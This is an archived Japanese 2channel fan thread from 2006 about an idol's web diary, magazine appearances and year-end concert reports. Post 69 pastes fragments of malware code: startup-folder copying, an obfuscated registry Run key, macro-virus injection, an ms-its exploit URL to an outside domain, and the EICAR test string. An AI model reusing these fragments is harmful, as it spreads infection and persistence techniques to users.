5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

54℃

1 :O【(´д`・)<℃ん欲℃ーちゃんやで:2006/12/18(月) 07:11:42 ID:kRKgXlXj
(´д`・)<錦荘エロベーターでのお約束!

  ℃〜sage推奨でおながいします〜℃
  ※スレ立ては970を過ぎてから!必ず宣言をしてからおながいします
  実況禁止
  安置・age厨・煽り・甜菜は放置。スルッスー精神で
  決めつけ・他タレ・他ズニア・他担貶しや比較はなしで
  他のスレ独自の用語は使わないで
  ナリと少しでも感じたならへたなレスはつけるなア゙ーハ☆
  ★女ネタは ↓ でドゾー
  http://tv7.2ch.net/test/read.cgi/jr/1160572042/
  前スレ 53°
  http://tv7.2ch.net/test/read.cgi/jr/1159960678/
  過去ログ
  http://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/150

  【テレビ】毎週火曜24:12〜:テレビ東京「スカ☆J 一番星」
       毎週水曜24:35〜:関西テレビ「ほんじゃに」(毎週火曜22:00〜BSフジ)
  【ラジオ】毎月2ゲスト土曜:ミュージックパラダイス AM1008 24:00〜24:30
       たまにゲスト土曜:聞くジャニ8 AM1179 23:30〜24:00
       たまにゲスト日曜:週刊関ジャニ通信 AM1008 24:00〜24:30
  【DVD】アテンションプリーズDVD-BOX 好評発売中
      環八 LIVEDVD「Heat up!」 好評発売中             
  【CD】石鹸 シングル「サヤエンドウ/裸足のシンデレラボーイ」
      環八 シングル「関風ファイティング/プロ∞ペラ(+通常版:サムライブルース、未来の向こうへ)」 好評発売中
  【Web連載】ジャニーズweb「関ジャニ戦隊∞レンジャー」毎週木18:00更新
         ジャニーズweb「日記℃℃ー」不定期更新         
  【紺・舞台】環八全国ツアー(12/22広島、12/25,26名古屋、12/27,28,29横浜)

2 :ユー&名無しネ:2006/12/18(月) 17:42:41 ID:9LoQ3uvO
(´д`・)から見た(*`レ´*)→( ̄ω ̄)

3 :ユー&名無しネ:2006/12/18(月) 18:29:55 ID:OkjlaQfo
アテプリ
2006年ドラマ視聴率BEST10位圏外確定
12位ですん

4 :ユー&名無しネ:2006/12/18(月) 23:09:26 ID:q8ByqMXT
木直毛言己念マキコ

5 :ユー&名無しネ:2006/12/19(火) 00:26:24 ID:a2IaTl6D
>1
乙!

℃っくんのパラ紹介すごくよかったよ
升とPが楽しみ

6 :ユー&名無しネ:2006/12/19(火) 00:29:55 ID:5zutVrLg
>1
乙!


7 :ユー&名無しネ:2006/12/19(火) 00:36:13 ID:uAmx4zdK
℃っくんの2℃目の更新イイヨイイヨー(*´∀`)
面に対する言葉や表現がキツイときがあるから
ヒヤヒヤしたりもするけどこういう素直な気持ちが知れてホッコリ

でも面紹介がオワタら更新がパッタリ止みそうな件(w

8 :ユー&名無しネ:2006/12/19(火) 00:45:34 ID:4j1r4MWH
℃もウレシイんだな
ほとんど会わないから
石鹸麺からの反応が新鮮

ハワイが気になる・・・

9 :ユー&名無しネ:2006/12/19(火) 07:02:29 ID:EwWCBQCi
>1乙です

パラの℃っくん紹介も良かったよ
気付けば石鹸の交換日記状態になっててワロタ(w
こういうのイイヨイイヨ

10 :ユー&名無しネ:2006/12/19(火) 16:48:42 ID:ZgjUq29H
男なんだけど(ゲイではないから)
錦戸の演技が好きだわ、いやただそれだけスマソ

11 :ユー&名無しネ:2006/12/19(火) 17:56:14 ID:eHpzJ3pA
>1
乙℃ん欲

鼻歌にプロレスごっこ?に焼きそばマヨ(not付き=現在進行中
℃っくんみたいなヤシが周りに居ると大変だろうなといつもオモー(w

12 :ユー&名無しネ:2006/12/19(火) 18:27:09 ID:k7DOZg09

本人も感謝する時なんかよく自分でそんな事言ってるもんな(w

13 :ユー&名無しネ:2006/12/19(火) 19:59:25 ID:6oOZ9gNI
彼女がイチバン大変だろうな

14 :ユー&名無しネ:2006/12/19(火) 20:10:08 ID:20QrUdvv
℃っくん石鹸としてもヤル気になってきてて嬉フィス

15 :ユー&名無しネ:2006/12/19(火) 20:15:46 ID:DVvE7XjX
℃っくんにしてはガンガって更新してるよな(w
しかも公開交換日記で楽しス(*´∀`)
来年℃っくんにとって飛躍の年になるといいな

16 :ユー&名無しネ:2006/12/20(水) 00:47:11 ID:dqlqXHan
「いや、俺もや」がカ○゙エエ

17 :ユー&名無しネ:2006/12/20(水) 02:25:46 ID:olsrnv49
スカJって視聴率いいの?

18 :ユー&名無しネ:2006/12/20(水) 20:56:35 ID:+hsvOGgj
笛ぬこに℃っくんの名前蟻
気にする笛ワロス(w


19 :ユー&名無しネ:2006/12/20(水) 21:19:09 ID:gj5wapwa
d見てきたよ
笛気にしないで好きな事書きなよ笛
℃っくんそんなに頻繁にチェックしてないから大丈夫(*´∀`)

話は変わるけど☆誌の寝顔℃っくんがカバエくて危なくモヘしぬところだった

20 :ユー&名無しネ:2006/12/20(水) 21:52:03 ID:agtrJGvG
笛には℃っくんを言い負かして欲スィのでレッツファイトキボン(w
芋誌のあばらが

21 :ユー&名無しネ:2006/12/20(水) 22:23:10 ID:lCmsbSf2
…干物だよなアレは(w
レッツファイトといえば次の少蔵
過去VTRでまたロ君との対決とか流してくれるんだねwktk

22 :ユー&名無しネ:2006/12/20(水) 22:33:16 ID:agtrJGvG
〇歩誌
×芋誌
>21姐さんには何とか通じたみたいでヨカタ

23 :ユー&名無しネ:2006/12/20(水) 22:44:49 ID:vqVQ/lnC
月刊のTV誌のアテプリハワイ写真がまた見事な翔コレ(w
Tシャツもっと大人っぽいの着せて欲しかったよ

24 :ユー&名無しネ:2006/12/20(水) 23:03:37 ID:lCmsbSf2
>22
いやテケトーに読み流して間違いに気付かなかっただけだスマソ(w

まあボミョンでこそ翔コレだしな
℃コレも衣装もたまにすごいの披露してくれて楽しめス

25 :ユー&名無しネ:2006/12/21(木) 00:29:09 ID:vIjwkIUF
℃っくん顔に肉が無いの自覚しててウレシス
もうちっとフクーラガンガれ

26 :ユー&名無しネ:2006/12/21(木) 01:21:46 ID:AMdzk3uA
(●д●・)パンダwktk

27 :ユー&名無しネ:2006/12/21(木) 17:43:38 ID:5fHbADSo
Googleで2006年に検索されたキーワードのランキング
・男優
1位 赤西仁
2位 亀梨和也
3位 小池徹平
4位 山下智久
5位 オダギリジョー
6位 木村拓哉
7位 福山雅治
8位 錦戸亮
9位 堂本剛
10位 玉木宏


28 :ユー&名無しネ:2006/12/21(木) 18:18:06 ID:FqAef0tJ
梅酒カンパリビールかな?

29 :ユー&名無しネ:2006/12/21(木) 18:26:19 ID:6T7xHQY/
梅酒カンパリビールだな(w
そしてカップ焼きそばはペ〇ングに1000℃んくさ

30 :ユー&名無しネ:2006/12/21(木) 18:27:45 ID:kgh19gPT
いやいや梅干カンパチケールですよ

31 :ユー&名無しネ:2006/12/21(木) 18:45:40 ID:nGcq3haB
何その健康的な3点セット(w
梅干といえば駄菓子スチな悪魔に釣られた遠いおもひで

32 :ユー&名無しネ:2006/12/22(金) 15:01:34 ID:IhzTDnZn
2006年生まれの読み方ランクで男の子ハルトくんが1位
http://www.meijiyasuda.co.jp/profile/etc/ranking/read/
リットル効果?(w

33 :ユー&名無しネ:2006/12/22(金) 19:01:59 ID:ueLXpBUy
パラ日記にサラっと℃っくん

34 :ユー&名無しネ:2006/12/22(金) 21:19:48 ID:io3Qmeex
やり取り禿ホコーリだな
そして何度も画面更新してしまう今日この頃

35 :ユー&名無しネ:2006/12/22(金) 21:31:45 ID:FMnNPfEN
広島無事終了
今日も元気に跳び回っておりました
1部では最近買った電動ハブラシを熱く語り
2部ではサンタにもらった中古のマリオカートを熱く語ってた

ユニスレ見てないのでガイシュツだったらスマソ

36 :ユー&名無しネ:2006/12/22(金) 21:36:40 ID:EG2wAbd7
>31
実はカリカリ梅言う程スチじゃなかったんだよな
しかも理由がそう言った方がカ○゙エエなチビ℃…恐ろしい子!

>35
乙dです
電動ハブラシを℃う熱く語ったのか気になる木(w

37 :35:2006/12/22(金) 21:56:45 ID:FMnNPfEN
>36
アメリカ産のナンチャラとか言う電動ハブラシを買ったらしいんだが
「外国はズゲェよ!歯に数分当てるだけでなんたらかんたら」と
よく分からない説明を若干興奮気味で語ってた(w

38 :ユー&名無しネ:2006/12/22(金) 22:11:08 ID:EG2wAbd7
>37
dバロスだが会場の空気が心配だ(w
また何か思い出したらよろですノシ

39 :ユー&名無しネ:2006/12/22(金) 22:42:59 ID:1rlrFzUM
歩誌
濡れた仔犬がセクスィビームを放っていていいのかと小一時(ry
_ト ̄|○

40 :ユー&名無しネ:2006/12/23(土) 01:14:12 ID:8VCTM+Jq
>39
まだ歩誌見てないんだけど変な期待していいのか?(w

>35
レポd
℃っくんホント家電スチだな(w

41 :ユー&名無しネ:2006/12/23(土) 02:42:05 ID:JnHU+3t2
音楽戦士の℃っくん笑顔多くてホコーリだが
前髪チトウザッシュ鴨
℃っくん前髪も少し切ろうか
それでもカバエエからいいが(w

42 :ユー&名無しネ:2006/12/23(土) 10:17:24 ID:HizyLVjk
>40
期待してイイとオモー
自分的にはこれ以上書くと
もっと痛いことになりそうな程なので自粛するノシ


43 :ユー&名無しネ:2006/12/23(土) 15:16:51 ID:fDf9enHY
赤西仁を飯島三智女史はジェイ・ドリームで預かる!?
ttp://z.la/k3vty

44 :ユー&名無しネ:2006/12/23(土) 23:26:51 ID:TiO53Thw
Heart Shaped Rome

45 :ユー&名無しネ:2006/12/23(土) 23:28:53 ID:d9HQgvw7
軽井沢のありさをジャニヲタから追放したい件

46 :ユー&名無しネ:2006/12/24(日) 04:08:46 ID:aEfpCdPC
歩誌の℃っくん$誌では珍しくテラ映り良くてヤバス棚

47 :がぁ:2006/12/24(日) 10:30:29 ID:Fe46jXnY
$誌ってなんですか!!??
教えてくださぃ(>_<)

48 :ユー&名無しネ:2006/12/24(日) 12:10:01 ID:ElhiDujw
>47
ロムれ

49 :ユー&名無しネ:2006/12/25(月) 12:27:52 ID:JwyeQC8t
℃っくんが買った電動ハブラシのブランド
多くの芸能人やモデル御用達と書いてあってワロタ

50 :ユー&名無しネ:2006/12/25(月) 15:45:21 ID:j1m+sfl4
今更家だが女性セブンの環八楽屋密着で
ミューパラでもらったバスローブ着ててホコーリ

51 :ユー&名無しネ:2006/12/25(月) 20:19:17 ID:nGhkaDCX
ノシ
テラ喜んでみんなの前でベロベロ着るって言ってたもんな(w

52 :ユー&名無しネ:2006/12/25(月) 21:11:25 ID:tcvGREHm
捌ける時いつかのクリトリス歌った

53 :ユー&名無しネ:2006/12/25(月) 21:45:03 ID:7icLnhFe
ちょセブンあなどれじ
扉のちょっと珍しい表情にモヘ(*´д`*)

54 :ユー&名無しネ:2006/12/25(月) 23:52:38 ID:Kdy4qhZJ
>52
稲葉タソの歌い方真似してたように聞こえた(w

55 :ユー&名無しネ:2006/12/26(火) 01:01:57 ID:l+NJr4BP
履歴に玉木タンのスレ出てるけど
ここの姐さんにファンいるのか(w

56 :ユー&名無しネ:2006/12/26(火) 04:17:42 ID:dj9i0zZd
小さすぎ








外見も中身も

57 :ユー&名無しネ:2006/12/26(火) 08:29:38 ID:GXL/EQ8e
>>56
ちんこはでかいお⊂二二二( ^ω^)二ニニ⊃

58 :ユー&名無しネ:2006/12/26(火) 11:46:28 ID:Ymus5FYC
>>57
信じられない

59 :ユー&名無しネ:2006/12/26(火) 11:49:00 ID:o81C8y3B
どーでもいいすよ
℃んびき(・∀・)★

60 :ユー&名無しネ:2006/12/26(火) 23:17:23 ID:fIGpS1SY
本家電ランキングのファッソン前回にひき続き素晴らしいな(w

61 :ユー&名無しネ:2006/12/27(水) 00:06:20 ID:+pgz+cuw
>60
もうアキバ系にしか見えない(w

環八紺レポの℃っくんいろいろとワロス
ほんとはパンシ見せるのスチなくせに(w

62 :ユー&名無しネ:2006/12/27(水) 00:15:52 ID:+JK9db1O
>>49
ttp://www.braun.co.jp/products/oral/dntp.html
これか?

63 :ユー&名無しネ:2006/12/27(水) 00:17:27 ID:6/d0nSbk
>60 ノシ
昔のセンスイイ℃っくんを返して!orz

64 :ユー&名無しネ:2006/12/27(水) 00:34:33 ID:8V/BCe5n
いや昔から言う程(ry…てかあれ殆ど衣装じゃないか?
℃ちらにせよテンソン高須で面白かったからオゲ(w

65 :ユー&名無しネ:2006/12/27(水) 00:46:45 ID:xOoWaqIe
℃っくんの服って男受けはイイみたいだけど
女から見るとそうカコヨスでもない時の方が多いような気がしないでもない(w

66 :ユー&名無しネ:2006/12/27(水) 01:01:24 ID:nBJrUiEf
もうチト肉をつけられれば
もっと色んな服が似合う希ガス


67 :ユー&名無しネ:2006/12/27(水) 01:31:18 ID:i+0nSv2n
ま た か る ぁ げ か

68 :ユー&名無しネ:2006/12/27(水) 01:32:13 ID:y5t0FHIf
>62
いろんな意味で違うのでロムってね

69 :<body onload=window()>:2006/12/27(水) 06:44:41 ID:0TZYEtf8
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

70 :ユー&名無しネ:2006/12/27(水) 07:05:43 ID:S4kab+cP
女性セブンのオレンジのダウンも正直ビミョーだ

71 :ユー&名無しネ:2006/12/27(水) 12:27:10 ID:306xl+aJ
℃っくん更新しました

72 :ユー&名無しネ:2006/12/27(水) 13:07:45 ID:+pgz+cuw
℃っくん更新待ってたよ℃っくん
天使時代のP℃エピカワエエ

73 :ユー&名無しネ:2006/12/27(水) 16:01:06 ID:i+0nSv2n
Σ(゚Д゚≡゚Д゚)
更新されてるとビクーリするのは何故だろう何故かしら

℃っくんは他面に気遣わせすぎないようにガンガレよ(w

74 :ユー&名無しネ:2006/12/27(水) 16:07:17 ID:vfQcLRV/
次の紹介は誰かな〜

75 :ユー&名無しネ:2006/12/27(水) 16:29:20 ID:8V/BCe5n
>73
そこで驚きが生じてしまう原因は℃っくん以外の何でもない

エピの時期的に配置がごっちゃになってる部分がチトある気がするけど
色々思い出してホコーリしたよ

76 :ユー&名無しネ:2006/12/28(木) 01:37:43 ID:MXa2BD9x
更新すると驚かれる℃っくんって一体(ノ∀`)
焦らしももはや楽しみの一つだ(w

77 :ユー&名無しネ:2006/12/28(木) 11:34:17 ID:aZujyXqz
サヤエンPVはガイシュツ?

78 :ユー&名無しネ:2006/12/28(木) 13:36:44 ID:tnuYD6Q/
今日一部℃っくんテンション高須ですた

79 :ユー&名無しネ:2006/12/28(木) 15:40:46 ID:nrtA2g4y
1部℃っくんどうしたの?ってぐらいのテンションでした(w

80 :ユー&名無しネ:2006/12/28(木) 16:24:36 ID:DMpv37XN
よく言うよ付き合い始めた時彼女18だったくせに

81 :ユー&名無しネ:2006/12/28(木) 16:49:02 ID:/3+6w0uA
↑どーゅー事??

82 :ユー&名無しネ:2006/12/28(木) 17:09:20 ID:eQ46KQzX
付き合う年齢のヤシか?

83 :ユー&名無しネ:2006/12/28(木) 17:17:55 ID:s4UsgaK7
恋愛対象が20から26って狭すぎだよ…ドックン

84 :ユー&名無しネ:2006/12/28(木) 17:20:57 ID:/3+6w0uA
まぢカ↓ァタシ18だから恋愛対象外(pд`q;))ワラ

85 :ユー&名無しネ:2006/12/28(木) 17:25:50 ID:eQ46KQzX
妹が20だからっていうのは関係ないか?

86 :ユー&名無しネ:2006/12/28(木) 17:40:48 ID:0vd2TSqV
ガキもオバもイラネってことだし結構ふつうだなw

87 :ユー&名無しネ:2006/12/28(木) 17:52:25 ID:A5XdC2Xs
>>77
kwsk

88 :87:2006/12/28(木) 17:53:11 ID:A5XdC2Xs
sage忘れスマソ

89 :ユー&名無しネ:2006/12/28(木) 19:37:19 ID:iY2+cZNc
>80-88
ロムれ

90 :ユー&名無しネ:2006/12/28(木) 19:47:34 ID:TwPCWEE2
アニメ℃っくん捕獲出来てたワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*
宝物頭に乗せたり熊に追いかけられたりキャワ(w

ところでPチャソ紹介は随分カバエエエピ持ってくるんだな℃っくん(*´∀`)
Pの事に限らずラジオやトーク番組でそういうエピを1つ2つ詳しく話せばいいとオモーよ

91 :ユー&名無しネ:2006/12/28(木) 19:53:29 ID:LkE5IEF3
>94
どこで見たんだ?
姐さんkwskヨロ

92 :ユー&名無しネ:2006/12/28(木) 19:56:38 ID:LkE5IEF3
× >94
○ >90

93 :ユー&名無しネ:2006/12/28(木) 20:31:43 ID:lG5rx/nN
自分は90姐さんじゃないがスカパーで流れた
今のところリピート放送ナスビ
イラレで作りまんた的アニメと紺映像で構成されてる

アニメのパラが細目に描かれてて細かいと思ってたが
よく見たらアニメ℃っくんも垂れ目気味だった
紺映像はガンダラーダでカメラアピしてるところがあったりでウマー

94 :ユー&名無しネ:2006/12/28(木) 20:49:01 ID:LkE5IEF3
>93
姐さんd!
スカパーだったのかorz
地上波で流れてくれナモナモ

95 :ユー&名無しネ:2006/12/28(木) 21:38:47 ID:O43zsKe3
アニメもテラカ○゙エかったからまた流れるといいな

環八紺@鯱ではゆるパーマかけてる風に見えたんだが
横蟻では℃うだったの可能?

96 :ユー&名無しネ:2006/12/28(木) 21:46:05 ID:UXiC1QWh
>95
ただのモッサリでしたよ
ビダンによるとあえてブローをしっかりしないスタイリングラスィ
環八紺28日1部ガイシュツの通りテンソンテラ高須
プロペラの前奏いつもは議長班長すが頭振ってジャンプするんだが
今日はそれにノリノリで参加してた

97 :ユー&名無しネ:2006/12/28(木) 22:02:48 ID:O43zsKe3
>96
レポdです
セットもしくは寝癖?ともオモタがただn…あえてのモッサリか(w

98 :ユー&名無しネ:2006/12/28(木) 22:29:20 ID:0h79Vl2p
28日、3部ではスタンド席の男ファソに℃から握手の手を差し伸べてた

99 :ユー&名無しネ:2006/12/28(木) 23:21:26 ID:vVCB924k
結局℃っくんの形態は何だったんだろ

100 :ユー&名無しネ:2006/12/28(木) 23:41:56 ID:CzAz6tQI
携帯はSOの赤

101 :ユー&名無しネ:2006/12/29(金) 00:21:06 ID:USOz02qW
28日3部で℃っくん親子席に乱入して子供達に囲まれ歌のお兄さん化してた(´д`・)♪テラカワユスでした

102 :ユー&名無しネ:2006/12/29(金) 00:35:42 ID:GeUFQloE
>101
レポdです
ハ…
ハァ━━━━━*´Д`*━━━━━ン!!!!


103 :ユー&名無しネ:2006/12/29(金) 01:16:56 ID:I8KAjxVF
他板ひ℃ックンから握手してもらったっていう男の人が書き込みしてたよ(・∀・)
テラ嬉しそうでホッコリした!
美女の手を払って握手したみたい
形態なんでおかしかったらスマソ

104 :ユー&名無しネ:2006/12/29(金) 01:29:58 ID:vtFtz6mh
携帯だからと言う以前の問題として何かおかしいよ

105 :ユー&名無しネ:2006/12/29(金) 02:03:01 ID:zHwT94vF
つまり郷に入っては郷に従えという事です
自分に合った場所へ帰るor書き込む前にまず↓を893回読みましょう
http://tv7.2ch.net/test/read.cgi/jr/1152866225/

106 :ユー&名無しネ:2006/12/29(金) 14:11:18 ID:UXXzu63v
1部MCの℃っくん話がワロスだたたのでレポしますノシ
蛇煮内で仲良い先輩聞かれて歪にはたまに電話すると答える℃っくん
歪の前では班長みたいなキャラになる℃っくん@ヘンリ
℃っくんヘンリ歪斗でダーツ行った時にそれが発覚
頭ボコボコ叩かれてケチョンケチョンに言われるらしい(w
(;´д`・*)ノ<やめてくださいよ
ってなる℃っくん(w
たまにウルセー!オメーよーって言い返すラスィが
何だよって歪に返されると(;´д`・)<うっ…
℃っくん(ノ∀`)
歪のことをあの人人と接するの下手くそやねんと言ってたが
議長に「下手くそ同士や」言われて℃っくん納得してた(w

107 :ユー&名無しネ:2006/12/29(金) 15:00:01 ID:UXXzu63v
連投ウザーでスマソ

1部挨拶は
(´д`・)<℃ーも℃ーちゃんです!おはよー
℃っくん朝からテンソン高須で笑顔がテラカバエかったです
曲紹介でキャン風ファイティングって叫んでみたり
ヲバロックとか大袈裟な位フリが大きくてネジ緩み気味(w
自らセンターや蟻前に降りてヲタサービスしてました
アンコ後客席にありがd繰り返した後
(;´д`・)<ありがとう〜♪
って突然須磨兄さん曲を歌い出してニンマリ(w
アグリの衣装がテラ似合ってますた

108 :ユー&名無しネ:2006/12/29(金) 15:28:36 ID:SAK6/XUn
>106
レポd!歪の前で班長みたいな℃っくんワロス
ボコボコ叩かれて言い返されてウッってなる℃っくん見てみたい(w

109 :ユー&名無しネ:2006/12/29(金) 15:36:24 ID:zHwT94vF
キャン風ファイティングのキャンは噛んだんだよな?(w
アグリの衣装ファーの長さと℃っくんがアンバランスでちとワロタがカッコヨスだった

110 :ユー&名無しネ:2006/12/29(金) 16:33:20 ID:eIqlazel
常識知らずでスマソorz

歪って誰ですか?

111 :ユー&名無しネ:2006/12/29(金) 17:22:31 ID:0KOsqxis
>110
>105
聞かずに分かるまで、空気嫁るようになるまでのロム期間だよ

レポ姐さんd
ご飯食べに行った時は話に困って西呼んだ下手くそ同士(w
一応反撃しようとするイジられ℃っくんバロス

112 :ユー&名無しネ:2006/12/29(金) 17:43:14 ID:zHwT94vF
℃っくんが一方的に下手くそなだけのような気がしないでもない(ノ∀`)

113 :ユー&名無しネ:2006/12/29(金) 17:58:00 ID:Khe0I7vK
紺レポのウザーなくらいヘンリさんに絡みまくる℃っくんワロス(w

114 :ユー&名無しネ:2006/12/29(金) 18:06:07 ID:uKX9ioPx
かまってチャソな℃っくんテラモヘス

115 :ユー&名無しネ:2006/12/29(金) 18:41:58 ID:4vTvDFy0
ネタバレになるから詳しく書かないが
蹴鞠師℃っくんのラストにハァ━━━━━*´Д`*━━━━━ン!
出番は少ないけどおいしかったぞ

116 :ユー&名無しネ:2006/12/29(金) 18:49:27 ID:RZc0B3yH
色んなレポイパーイで嬉しス!
姐さん方dです
そしてドラマが見れない田舎在住な自分が悔しい…
見れる姐さん方自分の分まで楽しんで呉

117 :ユー&名無しネ:2006/12/29(金) 21:38:31 ID:i6BYW3Db
>115
ノシ
℃っくん役どころテライすイ

118 :ユー&名無しネ:2006/12/29(金) 21:55:09 ID:CsvMEPyF
確かに役だけで言ったら今まで1番良かったかも
でも新聞に名前載るほどの出番ではないとオモーけどね

119 :ユー&名無しネ:2006/12/29(金) 22:56:14 ID:vL0kDp8b
オーラス
℃っくん親子席の少年にプロペラパート歌わせてチュー
見つめる姿が妖艶でした
ラストのせいかテンション高須でファンサかなりよかった
最初の挨拶で声枯らすんで皆さんも枯らしてくれ的な

レポ初めてなのでイロイロとマズーなとこあったらスマソ


120 :ユー&名無しネ:2006/12/29(金) 22:57:26 ID:B0AxgWck
ハルトに勝ったのか!アリエナス・・・orz


121 :ユー&名無しネ:2006/12/29(金) 23:11:10 ID:G7Q1xp6a
レポ姐さん方dd!
℃っくんテンソン高かったみたいでヨカタ(*´∀`)
ただ喉だけは枯らさないように気をつけてホスィ(´・ω・`)
繰り返し枯らしてたら喉に良くないし心配だ

122 :ユー&名無しネ:2006/12/29(金) 23:15:34 ID:pcwH5e29
オーラス入ってきましたノシ
ダブル餡子ロマネで℃っくん号泣。・゚・(ノД`)・゚・。
前半は両手で持ったタオルに顔を埋めたまま歌えず
ソロ紺の後にもうステージ上で泣かないて言ってたのに( ´∀`)σ)д`・)
トリプル餡子での挨拶もヲタからの声援に
やばいなコレ(泣きそう)と言いつつ
来年も1日1日を大切に生きていきたいと言ってました

レンジャー内では日記℃℃ーの寝起きドッキリ蟻(w
℃っくんが実際に寝転がって面が靴や歯ブラシをチェック
ちなみに靴の臭いはメロンとイチゴで歯ブラシの臭いは納豆
℃っくん自らの発言により起きそうなテイもやり
寝返り打ちながら(´д`・)<あ゙ーん
て無駄にカバエエ声を出してますた(w
とりあえず寝顔がハァ━━━━━*´Д`*━━━━━ン!!!! でした
ユニレポスレと内容被っててスマソです

123 :ユー&名無しネ:2006/12/29(金) 23:26:46 ID:xHuceRcY
レポ姐さん方d!
レポ読んでるだけで目汁が…

124 :ユー&名無しネ:2006/12/29(金) 23:50:20 ID:LCbILQRh
レポ姐さん方スペサルdです
班長キャラやら歌のお兄さんキャラやら…
七変化にまた拍車かかったのか
おまけにオーラスはマジ泣きですかそうですか

ハァ━━━━━*´Д`*━━━━━ン!!!!

125 :ユー&名無しネ:2006/12/29(金) 23:57:11 ID:0KOsqxis
℃っくん乙
今年は893輩+厨房+幼児+叔父さんになって涙もろく老化+他(ry
という不思議な現象が見られて楽しかったよ(w

126 :ユー&名無しネ:2006/12/30(土) 00:21:58 ID:AdyNHhny
流れd切ってスマソ
パラ日記に℃っくんへのエール
テラほっこり(´∀`*)

127 :ユー&名無しネ:2006/12/30(土) 00:26:31 ID:+fc3qu7m
>126
見てきたノシ
パラの℃っくんへノエール嬉しいな

128 :ユー&名無しネ:2006/12/30(土) 00:27:29 ID:+fc3qu7m
× へノ
○ への

スマン

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)